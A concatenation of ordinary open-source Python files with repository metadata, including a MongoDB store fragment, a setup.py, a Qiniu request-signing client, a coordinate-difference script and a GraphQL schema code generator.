return None,False,message
try:
buckets_iterator = self.client[database_id].collection_names()
bucket_names = [bucket for bucket in buckets_iterator]
return bucket_names,True,''
except:
error = "MongoDB.getBucketNames Failed with unknown exception"
return None,False,error
def getDatabaseNames(self):
"""
gets list of database names (currently just app_data and app_logs, by default all above methods only funciton on app_data aside from the logs)
Inputs:
None
Outputs:
([(string) bucket_id, ... ]) databaseNames, (bool) didSucceed, (string) message
Usage:
databaseNames,didSucceed,message = db.getDatabaseNames()
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
databases_iterator = self.client.database_names()
database_names = [database for database in databases_iterator]
return database_names,True,''
except:
error = "MongoDB.getDatabaseNames Failed with unknown exception"
return None,False,error
| {
"content_hash": "3b3dc0b8127c2de2c20264b543488774",
"timestamp": "",
"source": "github",
"line_count": 849,
"max_line_length": 445,
"avg_line_length": 35.38398115429918,
"alnum_prop": 0.5641623115076063,
"repo_name": "crcox/NEXT",
"id": "fc6e74f208a6f245d588bf4f9c8c2a3e00933956",
"size": "30041",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "next/database_client/PermStore/PermStore.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "74514"
},
{
"name": "JavaScript",
"bytes": "16603"
},
{
"name": "Python",
"bytes": "817267"
},
{
"name": "Shell",
"bytes": "5783"
}
],
"symlink_target": ""
} |
import os
from setuptools import setup, find_packages
def read(fname):
    """Return the text of *fname*, resolved relative to this file's directory."""
    here = os.path.dirname(__file__)
    return open(os.path.join(here, fname)).read()
# Minimal package metadata; no install-time dependencies are declared.
setup(
    name='recsys_data_pipeline',
    version='1.0',
    install_requires=[],
    packages=find_packages(),
) | {
"content_hash": "610b15b3b1d7fe72ab7400908ec3fa13",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 70,
"avg_line_length": 22.583333333333332,
"alnum_prop": 0.6420664206642066,
"repo_name": "chrisbangun/dataflow-appengine",
"id": "9020850f43d33ba341d8cc862e505982a758c231",
"size": "271",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "6075"
},
{
"name": "JavaScript",
"bytes": "6345"
},
{
"name": "Python",
"bytes": "943330"
}
],
"symlink_target": ""
} |
from urlparse import urlparse
import hmac
from hashlib import sha1
from base64 import urlsafe_b64encode
from .. import rpc
from .. import conf
class Mac(object):
    """Holds a QBox access/secret key pair and signs data with
    HMAC-SHA1, URL-safe base64 encoded.

    When neither key is supplied, both are read from conf.
    """
    access = None
    secret = None

    def __init__(self, access=None, secret=None):
        if access is None and secret is None:
            access, secret = conf.ACCESS_KEY, conf.SECRET_KEY
        self.access, self.secret = access, secret

    def __sign(self, data):
        # HMAC-SHA1 over data, keyed by the secret key.
        digest = hmac.new(self.secret, data, sha1).digest()
        return urlsafe_b64encode(digest)

    def sign(self, data):
        """Return '<access>:<signature>' for the given data."""
        return '%s:%s' % (self.access, self.__sign(data))

    def sign_with_data(self, b):
        """Return '<access>:<signature>:<base64(b)>', signing the
        base64url-encoded payload itself."""
        encoded = urlsafe_b64encode(b)
        return '%s:%s:%s' % (self.access, self.__sign(encoded), encoded)

    def sign_request(self, path, body, content_type):
        """Sign an HTTP request: the path (plus '?query' when present),
        a newline, and — for form-encoded requests only — the body."""
        parsed = urlparse(path)
        data = parsed.path
        if parsed.query != "":
            data = ''.join([data, '?', parsed.query])
        data = ''.join([data, "\n"])
        if body and content_type in ("application/x-www-form-urlencoded",):
            data += body
        return '%s:%s' % (self.access, self.__sign(data))
class Client(rpc.Client):
    """rpc.Client that signs every request with a Mac before sending.

    Arguments:
        host: Host passed through to rpc.Client.
        mac (Mac|None): Credentials used for signing; a default Mac
            (built from conf) is created when omitted.
    """
    def __init__(self, host, mac=None):
        if mac is None:
            mac = Mac()
        super(Client, self).__init__(host)
        self.mac = mac

    def round_tripper(self, method, path, body, header=None):
        """Add the QBox Authorization header, then delegate to
        rpc.Client.round_tripper."""
        # Bug fix: `header={}` was a shared mutable default that this
        # method mutates; a fresh dict is now created per call.
        if header is None:
            header = {}
        token = self.mac.sign_request(
            path, body, header.get("Content-Type"))
        header["Authorization"] = "QBox %s" % token
        return super(Client, self).round_tripper(method, path, body, header)
| {
"content_hash": "e38e5e4361e161b0dca89c75eb7e09e3",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 76,
"avg_line_length": 28.737704918032787,
"alnum_prop": 0.5653166001140901,
"repo_name": "davidvon/pipa-pay-server",
"id": "dcee6fbcfe6ad961d28b45938ef2931967a05933",
"size": "1777",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "site-packages/qiniu/auth/digest.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "6349"
},
{
"name": "CSS",
"bytes": "6111"
},
{
"name": "HTML",
"bytes": "73437"
},
{
"name": "JavaScript",
"bytes": "34960"
},
{
"name": "Nginx",
"bytes": "3074"
},
{
"name": "Python",
"bytes": "13078022"
}
],
"symlink_target": ""
} |
# Usage text written to stderr when the script gets bad arguments
# (doubles as the script's documentation).
err_msg = """
Typical Usage:
raw2subtractlines.py [-norm] < coordinate_file
Coordinates read from one line of the file are subtracted from coordinates
from the next line of the file (if it contains coordinates) and printed to
the standard output. Blank lines in the input file are copied to the
standard out. Each block of N lines of text containing M columns in the
input file produces a block of N-1 lines of text (containing M columns)
in the output file.
The optional "-norm" argument allows you to normalize the resulting vectors
after they have been subtracted.
Examples:
raw2subtractlines.py < coord_bead_chain.raw > coords_bond_vector.raw
raw2subtractlines.py -norm < coord_bead_chain.raw > coords_bond_direction.raw
"""
import sys
from math import *
#import numpy as np
def ProcessStructure(x_id, normalize=False):
    """Print the differences between successive coordinate rows of x_id.

    For each of the N-1 adjacent row pairs, writes the D-dimensional vector
    x_id[i+1] - x_id[i] (optionally rescaled to unit length) to standard
    output as one whitespace-separated line.

    x_id      -- list of N rows, each a list of D floats
    normalize -- if True, divide each difference vector by its Euclidean norm
    """
    D = len(x_id[0])
    N = len(x_id)
    for i in range(0, N-1):
        # NOTE: the original wrapped this in a redundant "for d in range(0, D)"
        # loop, recomputing the identical list D times; once is enough.
        x_diff = [x_id[i+1][d] - x_id[i][d] for d in range(0, D)]
        if (normalize):
            x_diff_len = 0.0
            for d in range(0, D):
                x_diff_len += x_diff[d] * x_diff[d]
            x_diff_len = sqrt(x_diff_len)
            for d in range(0, D):
                x_diff[d] /= x_diff_len
        sys.stdout.write(str(x_diff[0]))
        for d in range(1, D):
            sys.stdout.write(' ' + str(x_diff[d]))
        sys.stdout.write('\n')
# Parse the argument list:
# The script accepts at most one optional flag (-norm or a help request).
if (len(sys.argv) > 2):
    sys.stderr.write("Error:\n\nTypical Usage:\n\n"+err_msg+"\n")
    exit(1)
if ((len(sys.argv) == 2) and
        ((sys.argv[1] == '-h') or
         (sys.argv[1] == '-?') or
         (sys.argv[1] == '--help'))):
    sys.stderr.write("Error:\n\nTypical Usage:\n\n"+err_msg+"\n")
    exit(1)
normalize = False
if (len(sys.argv) == 2):
    if ((sys.argv[1] == '-n') or
            (sys.argv[1] == '-norm') or
            (sys.argv[1] == '-normalize')):
        normalize = True
    else:
        sys.stderr.write("Error: Unrecognized command line argument:\n"
                         " \""+sys.argv[1]+"\"\n")
        exit(1)
# Now read the input file:
# x_id accumulates the rows of the current frame; a blank (or comment-only)
# line flushes the frame through ProcessStructure().
x_id = []
count_structs = 0
is_new_structure = True
interpret_blank_lines_as_new_structures = True
in_file = sys.stdin
for line_orig in in_file:
    # Strip everything after a '#' comment marker.
    ic = line_orig.find('#')
    if ic != -1:
        line = line_orig[:ic]
    else:
        line = line_orig.rstrip('\n')
    tokens = line.strip().split()
    if len(tokens) == 0:
        if (interpret_blank_lines_as_new_structures and
                (len(x_id) > 0)):
            # blank (or comment) lines signal the next frame of animation
            ProcessStructure(x_id, normalize)
            sys.stdout.write('\n')
            x_id = []
            count_structs += 1
            #sys.stderr.write('done\n')
            is_new_structure = True
        continue  # skip blank lines or comments
    elif is_new_structure:
        is_new_structure = False
    # x_d contains the coordinates read from the
    # most recent line in the current frame
    x_d = list(map(float, tokens))
    x_id.append(x_d)
# Flush the final frame (files need not end with a blank line).
if len(x_id) > 0:
    ProcessStructure(x_id, normalize)
| {
"content_hash": "15f00cbc110a53e42f51a9d9c1a6af6a",
"timestamp": "",
"source": "github",
"line_count": 114,
"max_line_length": 80,
"avg_line_length": 27.859649122807017,
"alnum_prop": 0.575566750629723,
"repo_name": "jewettaij/moltemplate",
"id": "dd01e783d193f0b15b03d06faa19b2b3086e42b5",
"size": "3200",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "examples/coarse_grained/DNA_models/dsDNA_only/2strands/3bp_2particles/simple_dna_example/measure_persistence_length/raw2subtractlines.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "228"
},
{
"name": "Python",
"bytes": "1751104"
},
{
"name": "Shell",
"bytes": "178239"
}
],
"symlink_target": ""
} |
import re
from datetime import datetime
from uuid import UUID
from enum import Enum, auto
from graphql.language.source import Source
from graphql.language.parser import parse
from graphql.language.ast import (
ObjectTypeDefinition,
NamedType,
NonNullType,
ListType,
InputObjectTypeDefinition,
EnumTypeDefinition,
)
from graphscale.utils import param_check
def parse_grapple(grapple_string):
    """Parse grapple-flavored GraphQL schema text into a GrappleDocument."""
    document_ast = parse(Source(grapple_string))
    return GrappleDocument(types=[
        create_grapple_type_definition(definition)
        for definition in document_ast.definitions
    ])
def print_grapple_pents(document_ast):
    """Render generated Pent base classes for every @generatePent object type."""
    writer = CodeWriter()
    for object_type in document_ast.object_types():
        if object_type.generate_pent():
            print_generated_pent(writer, object_type)
            writer.blank_line()
    return writer.result()
def print_graphql_defs(document_ast):
    """Render GraphQL wrapper classes for all object, input, and enum types."""
    writer = CodeWriter()
    for object_type in document_ast.object_types():
        print_graphql_object_type(writer, document_ast, object_type)
    for input_type in document_ast.input_types():
        print_graphql_input_type(writer, input_type)
    for enum_type in document_ast.enum_types():
        print_graphql_enum_type(writer, enum_type)
    return writer.result()
def uncapitalized(string):
    """Return *string* with its first character lower-cased.

    Unlike the original (``string[0]``), an empty string is returned
    unchanged instead of raising IndexError.
    """
    return string[:1].lower() + string[1:]
def print_graphql_top_level(document_ast):
    """Render generated_query_fields(), one top-level getter per fetchable type.

    Only object types declaring an 'id' field are fetchable; pent_map supplies
    the backing loader keyed by type name.
    """
    writer = CodeWriter()
    writer.line('def generated_query_fields(pent_map):')
    writer.increase_indent()  # function body
    writer.line('return {')
    writer.increase_indent()  # dictionary body
    for grapple_type in document_ast.object_types():
        if not grapple_type.has_field('id'):  # needs to be fetchable
            continue
        field_name = uncapitalized(grapple_type.name())
        graphql_type_inst = 'GraphQL%s.type()' % grapple_type.name()
        writer.line("'%s': define_top_level_getter(%s, pent_map['%s'])," %
                    (field_name, graphql_type_inst, grapple_type.name()))
    writer.decrease_indent()  # end dictionary body
    writer.line('}')
    writer.decrease_indent()  # end function body
    writer.blank_line()
    return writer.result()
def print_graphql_input_type(writer, grapple_type):
    """Render the GrappleType wrapper class for a GraphQL input object type."""
    writer.line('class GraphQL%s(GrappleType):' % grapple_type.name())
    writer.increase_indent()  # begin class definition
    writer.line('@staticmethod')
    writer.line('def create_type():')
    writer.increase_indent()  # begin create_type body
    writer.line('return GraphQLInputObjectType(')
    writer.increase_indent()  # begin GraphQLInputObjectType .ctor args
    writer.line("name='%s'," % grapple_type.name())
    writer.line('fields=lambda: {')
    writer.increase_indent()  # begin field declarations
    for field in grapple_type.fields():
        print_graphql_input_field(writer, field)
    writer.decrease_indent()  # end field declarations
    writer.line('},')
    writer.decrease_indent()  # end GraphQLInputObjectType .ctor args
    writer.line(')')
    writer.decrease_indent()  # end create_type body
    writer.decrease_indent()  # end class definition
    writer.blank_line()
def print_graphql_enum_type(writer, grapple_type):
    """Render the GrappleType wrapper class for a GraphQL enum type."""
    writer.line('class GraphQL%s(GrappleType):' % grapple_type.name())
    writer.increase_indent()  # begin class definition
    writer.line('@staticmethod')
    writer.line('def create_type():')
    writer.increase_indent()  # begin create_type body
    writer.line('return GraphQLEnumType(')
    writer.increase_indent()  # begin GraphQLEnumType .ctor args
    writer.line("name='%s'," % grapple_type.name())
    writer.line('values={')
    writer.increase_indent()  # begin value declarations
    for value in grapple_type.values():
        writer.line("'%s': GraphQLEnumValue()," % value)
    writer.decrease_indent()  # end value declarations
    writer.line('},')
    writer.decrease_indent()  # end GraphQLEnumType.ctor args
    writer.line(')')
    writer.decrease_indent()  # end create_type body
    writer.decrease_indent()  # end class definition
    writer.blank_line()
def print_graphql_object_type(writer, document_ast, grapple_type):
    """Render the GrappleType wrapper class for a GraphQL object type."""
    writer.line('class GraphQL%s(GrappleType):' % grapple_type.name())
    writer.increase_indent()  # begin class definition
    writer.line('@staticmethod')
    writer.line('def create_type():')
    writer.increase_indent()  # begin create_type body
    writer.line('return GraphQLObjectType(')
    writer.increase_indent()  # begin GraphQLObjectType .ctor args
    writer.line("name='%s'," % grapple_type.name())
    writer.line('fields=lambda: {')
    writer.increase_indent()  # begin field declarations
    for field in grapple_type.fields():
        print_graphql_field(writer, document_ast, field)
    writer.decrease_indent()  # end field declarations
    writer.line('},')
    writer.decrease_indent()  # end GraphQLObjectType .ctor args
    writer.line(')')
    writer.decrease_indent()  # end create_type body
    writer.decrease_indent()  # end class definition
    writer.blank_line()
def type_instantiation(type_string):
    """Return the Python expression that yields the GraphQL type object.

    Built-in scalars map to graphql-core singletons; any other name is
    assumed to be a generated GrappleType wrapper exposing .type().
    """
    builtin_scalars = {
        'String': 'GraphQLString',
        'Int': 'GraphQLInt',
        'ID': 'GraphQLID',
    }
    if type_string not in builtin_scalars:
        return 'GraphQL%s.type()' % type_string
    return builtin_scalars[type_string]
def type_ref_string(type_ref):
    """Render *type_ref* as a graphql-core type-constructor expression."""
    if type_ref.is_list():
        ctor = 'list_of(%s)' % type_ref_string(type_ref.list_type())
    else:
        ctor = type_instantiation(type_ref.graphql_type())
    # Non-nullable references are wrapped in req() (GraphQLNonNull).
    return ctor if type_ref.is_nullable() else 'req(%s)' % ctor
def graphql_type_string(type_ref):
    """Render *type_ref* in GraphQL schema notation (e.g. '[Int!]!')."""
    if type_ref.is_list():
        rendered = '[%s]' % graphql_type_string(type_ref.list_type())
    else:
        rendered = type_ref.graphql_type()
    # A trailing '!' marks a non-nullable type in GraphQL notation.
    return rendered if type_ref.is_nullable() else rendered + '!'
def print_graphql_field(writer, document_ast, grapple_field):
    """Emit one entry of a GraphQLObjectType fields dict.

    Bare scalar fields collapse to a one-line GraphQLField; fields with
    arguments, enum return types, or names needing a python-name translation
    get an expanded constructor with an args dict and/or a resolver lambda.
    """
    type_ref_str = type_ref_string(grapple_field.type_ref())
    is_enum = document_ast.is_enum(grapple_field.type_ref().graphql_type())
    is_simple = grapple_field.is_bare_field() and not is_enum
    if is_simple:
        writer.line("'%s': GraphQLField(type=%s)," % (grapple_field.name(), type_ref_str))
        return
    writer.line("'%s': GraphQLField(" % grapple_field.name())
    writer.increase_indent()  # begin args to GraphQLField .ctor
    writer.line('type=%s,' % type_ref_str)
    if grapple_field.args():
        writer.line('args={')
        writer.increase_indent()  # begin entries in args dictionary
        for grapple_arg in grapple_field.args():
            arg_type_ref_str = type_ref_string(grapple_arg.type_ref())
            writer.line("'%s': GraphQLArgument(type=%s)," % (grapple_arg.name(), arg_type_ref_str))
        writer.decrease_indent()  # end entries in args dictionary
        writer.line('},')  # close args dictionary
    python_name = grapple_field.python_name()
    # Enum fields resolve to the enum member's .name (or None when unset).
    if is_enum:
        writer.line('resolver=lambda obj, args, *_: obj.%s(*args).name if obj.%s(*args) else None,'
                    % (python_name, python_name))
    elif grapple_field.name_requires_lambda():
        writer.line('resolver=lambda obj, args, *_: obj.%s(*args),' % python_name)
    writer.decrease_indent()  # end args to GraphQLField .ctor
    writer.line('),')  # close GraphQLField .ctor
def print_graphql_input_field(writer, grapple_field):
    """Emit one entry of a GraphQLInputObjectType fields dict."""
    type_ref_str = type_ref_string(grapple_field.type_ref())
    writer.line("'%s': GraphQLInputObjectField(type=%s)," % (grapple_field.name(), type_ref_str))
def graphql_type_to_python_type(graphql_type):
    """Map a GraphQL scalar name to the matching Python type's name.

    Non-scalar names (object/input/enum types) are returned unchanged.
    """
    scalar = {
        'ID': UUID,
        'Int': int,
        'Float': float,
        'String': str,
        'Boolean': bool,
        'DateTime': datetime,
    }.get(graphql_type)
    return graphql_type if scalar is None else scalar.__name__
class GrappleDocument:
    """A parsed collection of grapple type definitions with lookup helpers."""

    def __init__(self, *, types):
        self._types = types

    def object_types(self):
        """All object-type definitions, in declaration order."""
        return [ttype for ttype in self._types if ttype.is_object()]

    def input_types(self):
        """All input-type definitions, in declaration order."""
        return [ttype for ttype in self._types if ttype.is_input()]

    def enum_types(self):
        """All enum-type definitions, in declaration order."""
        return [ttype for ttype in self._types if ttype.is_enum()]

    def is_enum(self, name):
        """Truthy iff a type named *name* exists and is an enum."""
        found = self.type_named(name)
        return found and found.is_enum()

    def type_named(self, name):
        """Return the definition named *name*, or None when absent."""
        return next(
            (ttype for ttype in self._types if ttype.name() == name), None)
class TypeVarietal(Enum):
    """Which kind of GraphQL type a GrappleTypeDefinition represents."""
    OBJECT = auto()
    INPUT = auto()
    ENUM = auto()
class GrappleTypeDefinition:
    """A single parsed type definition (object, input, or enum).

    Members not applicable to a varietal are empty ([] for fields, None for
    values); use the is_object/is_input/is_enum predicates before reading.
    """

    def __init__(self, *, name, fields, generate_pent, values=None, type_varietal):
        self._name = name
        self._fields = fields
        self._generate_pent = generate_pent
        self._type_varietal = type_varietal
        self._values = values

    @staticmethod
    def object_type(*, name, fields, generate_pent):
        """Alternate constructor for an object type definition."""
        return GrappleTypeDefinition(
            name=name,
            fields=fields,
            generate_pent=generate_pent,
            type_varietal=TypeVarietal.OBJECT)

    @staticmethod
    def input_type(*, name, fields):
        """Alternate constructor for an input object type definition."""
        return GrappleTypeDefinition(
            name=name,
            fields=fields,
            generate_pent=False,
            type_varietal=TypeVarietal.INPUT)

    @staticmethod
    def enum_type(*, name, values):
        """Alternate constructor for an enum type definition."""
        return GrappleTypeDefinition(
            name=name,
            fields=[],
            generate_pent=False,
            values=values,
            type_varietal=TypeVarietal.ENUM)

    def name(self):
        """Type name as declared in the schema."""
        return self._name

    def has_field(self, name):
        """True iff this type declares a field with the given name."""
        for field in self._fields:
            if field.name() == name:
                return True
        return False

    def fields(self):
        return self._fields

    def values(self):
        """Enum value names (None unless this is an enum type)."""
        return self._values

    def generate_pent(self):
        """True when the schema marked this type with @generatePent."""
        return self._generate_pent

    def is_object(self):
        return self._type_varietal == TypeVarietal.OBJECT

    def is_input(self):
        return self._type_varietal == TypeVarietal.INPUT

    def is_enum(self):
        return self._type_varietal == TypeVarietal.ENUM
class GrappleField:
    """A field on an object/input type: name, type reference, and arguments."""

    def __init__(self, *, name, grapple_type_ref, args):
        self._name = name
        self._grapple_type_ref = grapple_type_ref
        self._args = args
        # 'id' and camelCase names need a resolver lambda because the Python
        # accessor name differs from the GraphQL field name.
        self._name_requires_lambda = name == 'id' or is_camel_case(name)

    def is_bare_field(self):
        """True when the field needs neither an args dict nor a resolver."""
        return len(self._args) == 0 and not self.name_requires_lambda()

    def name(self):
        return self._name

    def name_requires_lambda(self):
        return self._name_requires_lambda

    def python_name(self):
        """Python accessor name: 'id' -> 'obj_id', camelCase -> snake_case."""
        if self.name() == 'id':
            return 'obj_id'
        if is_camel_case(self.name()):
            return to_snake_case(self.name())
        return self.name()

    def type_ref(self):
        return self._grapple_type_ref

    def args(self):
        return self._args
def filter_nodes(nodes, ast_cls):
    """Lazily select the members of *nodes* that are instances of *ast_cls*."""
    return filter(lambda candidate: isinstance(candidate, ast_cls), nodes)
def has_generate_pent_directive(type_ast):
    """True iff the type declaration carries the @generatePent directive."""
    return any(directive.name.value == 'generatePent'
               for directive in type_ast.directives)
def create_grapple_type_definition(type_ast):
    """Dispatch a graphql-core definition node to the matching builder.

    Raises for definition kinds other than object, input-object, and enum.
    """
    if isinstance(type_ast, ObjectTypeDefinition):
        return create_grapple_object_type(type_ast)
    elif isinstance(type_ast, InputObjectTypeDefinition):
        return create_grapple_input_type(type_ast)
    elif isinstance(type_ast, EnumTypeDefinition):
        return create_grapple_enum_type(type_ast)
    else:
        raise Exception('node not supported: ' + str(type_ast))
def create_grapple_enum_type(enum_type_ast):
    """Build a GrappleTypeDefinition from an enum definition AST node."""
    return GrappleTypeDefinition.enum_type(
        name=enum_type_ast.name.value,
        values=[value_node.name.value for value_node in enum_type_ast.values],
    )
def create_grapple_input_type(input_type_ast):
    """Build a GrappleTypeDefinition from an input-object definition AST node."""
    grapple_type_name = input_type_ast.name.value
    grapple_fields = [create_grapple_input_field(field) for field in input_type_ast.fields]
    return GrappleTypeDefinition.input_type(
        name=grapple_type_name,
        fields=grapple_fields,
    )
def create_grapple_object_type(object_type_ast):
    """Build a GrappleTypeDefinition from an object definition AST node."""
    grapple_type_name = object_type_ast.name.value
    grapple_fields = [create_grapple_field(field) for field in object_type_ast.fields]
    # @generatePent opts the type into Pent base-class generation.
    generate_pent = has_generate_pent_directive(object_type_ast)
    return GrappleTypeDefinition.object_type(
        name=grapple_type_name,
        fields=grapple_fields,
        generate_pent=generate_pent,
    )
def to_snake_case(camel_case):
    """Convert a camelCase or PascalCase identifier to snake_case."""
    # First pass: split before an uppercase letter that starts a capitalized
    # word ('HTTPServer' -> 'HTTP_Server').
    partially_split = re.sub(r'(.)([A-Z][a-z]+)', r'\1_\2', camel_case)
    # Second pass: split any remaining lower/digit-to-upper boundary,
    # then lowercase everything.
    return re.sub(r'([a-z0-9])([A-Z])', r'\1_\2', partially_split).lower()
def is_camel_case(string):
    """Return True when *string* contains at least one uppercase letter.

    The original returned the raw re.Match object (or None); returning a
    real bool is cleaner for an is_* predicate and remains backward
    compatible with the truthiness checks used by callers.
    """
    return re.search('[A-Z]', string) is not None
class GrappleFieldArgument:
    """Immutable name/type pair describing one GraphQL field argument."""

    def __init__(self, *, name, type_ref):
        self._name = name
        self._type_ref = type_ref

    def name(self):
        """Argument name as written in the schema."""
        return self._name

    def type_ref(self):
        """GrappleTypeRef describing the argument's declared type."""
        return self._type_ref
def create_grapple_field_arg(graphql_arg):
    """Build a GrappleFieldArgument from an argument AST node.

    Default values are not yet implemented and raise explicitly.
    """
    if graphql_arg.default_value:
        raise Exception('default_value not supported right now')
    return GrappleFieldArgument(
        name=graphql_arg.name.value,
        type_ref=create_grapple_type_ref(graphql_arg.type),
    )
def create_grapple_input_field(graphql_field):
    """Build a GrappleField from an input-object field AST node (no args)."""
    return GrappleField(
        name=graphql_field.name.value,
        grapple_type_ref=create_grapple_type_ref(graphql_field.type),
        args=[],
    )
def create_grapple_field(graphql_field):
    """Build a GrappleField (with arguments) from an object field AST node."""
    return GrappleField(
        name=graphql_field.name.value,
        grapple_type_ref=create_grapple_type_ref(graphql_field.type),
        args=[create_grapple_field_arg(graphql_arg) for graphql_arg in graphql_field.arguments]
    )
class GrappleTypeRef:
    """Reference to a type as used by a field: named or list, nullable or not."""

    def __init__(self, *, graphql_type=None, python_type=None, is_nullable, is_list=False, list_type=None):
        param_check(is_nullable, bool, 'is_nullable')
        param_check(is_list, bool, 'is_list')
        self._graphql_type = graphql_type
        self._python_type = python_type
        self._is_nullable = is_nullable
        self._is_list = is_list
        self._list_type = list_type

    @staticmethod
    def create_list_ref(*, list_type, is_nullable):
        """Alternate constructor for a list-of-*list_type* reference."""
        return GrappleTypeRef(is_list=True, list_type=list_type, is_nullable=is_nullable)

    def graphql_type(self):
        # None for list references; see list_type() instead.
        return self._graphql_type

    def python_type(self):
        return self._python_type

    def is_nullable(self):
        return self._is_nullable

    def is_list(self):
        return self._is_list

    def list_type(self):
        # GrappleTypeRef of the element type (None unless is_list()).
        return self._list_type
def create_grapple_type_ref(graphql_type_ast):
    """Translate a graphql-core type AST node into a GrappleTypeRef.

    Handles named types, non-null named types, list types, and non-null
    list types; anything else raises.
    """
    if isinstance(graphql_type_ast, NamedType):
        graphql_type_name = graphql_type_ast.name.value
        return GrappleTypeRef(
            graphql_type=graphql_type_name,
            python_type=graphql_type_to_python_type(graphql_type_name),
            is_nullable=True
        )
    elif isinstance(graphql_type_ast, NonNullType) and isinstance(graphql_type_ast.type, NamedType):
        core_graphql_type = graphql_type_ast.type.name.value
        return GrappleTypeRef(
            graphql_type=core_graphql_type,
            python_type=graphql_type_to_python_type(core_graphql_type),
            is_nullable=False
        )
    elif isinstance(graphql_type_ast, ListType):
        return GrappleTypeRef.create_list_ref(
            list_type=create_grapple_type_ref(graphql_type_ast.type),
            is_nullable=True,
        )
    elif isinstance(graphql_type_ast, NonNullType) and isinstance(graphql_type_ast.type, ListType):
        return GrappleTypeRef.create_list_ref(
            list_type=create_grapple_type_ref(graphql_type_ast.type.type),
            is_nullable=False,
        )
    raise Exception('not supported')
class CodeWriter:
    """Accumulates indented source lines and renders them as one string."""

    def __init__(self):
        self.lines = []  # rendered lines, indentation already applied
        self.indent = 0  # current indentation, in spaces

    def line(self, text):
        """Append *text* at the current indentation level."""
        self.lines.append('%s%s' % (' ' * self.indent, text))

    def blank_line(self):
        """Append an empty line (no indentation padding)."""
        self.lines.append('')

    def increase_indent(self):
        """Indent subsequent lines by four more spaces."""
        self.indent += 4

    def decrease_indent(self):
        """Outdent by four spaces; refuses to move left of column zero."""
        if self.indent <= 0:
            raise Exception('indent cannot be negative')
        self.indent -= 4

    def result(self):
        """Render all accumulated lines, newline-separated (no trailing one)."""
        return '\n'.join(self.lines)
def print_generated_pent(writer, grapple_type):
    """Render the generated Pent base class for one object type."""
    writer.line('class %sGenerated(Pent):' % grapple_type.name())
    writer.increase_indent()  # begin class implementation
    writer.blank_line()
    print_is_input_data_valid(writer, grapple_type)
    print_generated_fields(writer, grapple_type.fields())
    writer.decrease_indent()  # end class definition
def print_if_return_false(writer, if_line):
    """Emit *if_line* followed by an indented 'return False' body."""
    writer.line(if_line)
    writer.increase_indent()
    writer.line('return False')
    writer.decrease_indent()
def print_is_input_data_valid(writer, grapple_type):
    """Emit an is_input_data_valid stub that must be overridden manually.

    The automatic per-field checks below are currently disabled (commented
    out); the emitted stub raises so the manual subclass must implement it.
    """
    writer.line('@staticmethod')
    writer.line('# This method checks to see that data coming out of the database is valid')
    writer.line('def is_input_data_valid(data):')
    writer.increase_indent()
    writer.line("raise Exception('must implement in manual class')")
    writer.decrease_indent()
    writer.blank_line()
    # Disabled generated implementation, kept for reference:
    # writer.increase_indent() # begin is_input_data_valid implementation
    # print_if_return_false(writer, 'if not isinstance(data, dict):')
    # for field in grapple_type.fields():
    #     type_ref = field.type_ref()
    #     if type_ref.is_nullable():
    #         print_optional_data_check(writer, field)
    #     else:
    #         print_required_data_check(writer, field)
    # writer.line('return True')
    # writer.decrease_indent() # end is_input_data_valid implementation
    # writer.blank_line()
def print_required_data_check(writer, field):
    """Emit validation for a required (non-nullable) key of the data dict.

    The dict is keyed by the field's python_name, matching the accessors
    emitted by print_generated_fields.
    """
    python_type = field.type_ref().python_type()
    graphql_type = graphql_type_string(field.type_ref())
    print_if_return_false(
        writer,
        "if req_data_elem_invalid(data, '%s', %s): # %s: %s" %
        (field.python_name(), python_type, field.name(), graphql_type)
    )
def print_optional_data_check(writer, field):
    """Emit validation for an optional (nullable) key of the data dict.

    Keys the dict by field.python_name(), matching print_required_data_check
    and the accessors emitted by print_generated_fields (which read
    self._data by python_name); the original inconsistently used
    field.name() here.
    """
    python_type = field.type_ref().python_type()
    graphql_type = graphql_type_string(field.type_ref())
    print_if_return_false(
        writer,
        "if opt_data_elem_invalid(data, '%s', %s): # %s: %s" %
        (field.python_name(), python_type, field.name(), graphql_type)
    )
def print_generated_fields(writer, fields):
    """Emit a trivial accessor method for every field.

    Nullable fields read via dict.get (missing key -> None); required
    fields index directly so a missing key raises KeyError.
    """
    for field in fields:
        accessor_name = field.python_name()
        writer.line('def %s(self):' % accessor_name)
        writer.increase_indent()  # begin accessor body
        if field.type_ref().is_nullable():
            template = "return self._data.get('%s')"
        else:
            template = "return self._data['%s']"
        writer.line(template % accessor_name)
        writer.decrease_indent()  # end accessor body
        writer.blank_line()
| {
"content_hash": "8ca1fbfea13bd9c16c3aaf59161300a9",
"timestamp": "",
"source": "github",
"line_count": 559,
"max_line_length": 107,
"avg_line_length": 34.1788908765653,
"alnum_prop": 0.6438815031927143,
"repo_name": "schrockntemp/graphscaletemp",
"id": "f7695927f99f11ca454a30471704f2db88b0b417",
"size": "19106",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "graphscale/grapple/grapple_parser.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "184175"
}
],
"symlink_target": ""
} |
"""
.. module:: mpl_get_data_wuppe
:synopsis: Returns WUPPE spectral data as a JSON string through Randy's
mast_plot.pl service.
.. moduleauthor:: Scott W. Fleming <fleming@stsci.edu>
"""
import collections
from operator import itemgetter
from data_series import DataSeries
import requests
#--------------------
def mpl_get_data_wuppe(obsid):
    """
    Given a WUPPE observation ID, returns the spectral data.
    :param obsid: The WUPPE observation ID to retrieve the data from.
    :type obsid: str
    :returns: JSON -- The spectral data for this observation ID.
    Error codes:
    0 = No error.
    1 = HTTP Error 500 code returned.
    2 = "File not found error" returned by mast_plot.pl.
    3 = Wavelength and/or flux arrays are zero length.
    4 = Wavelength and flux arrays are not of equal length.
    """
    # This defines a data point for a DataSeries object as a namedtuple.
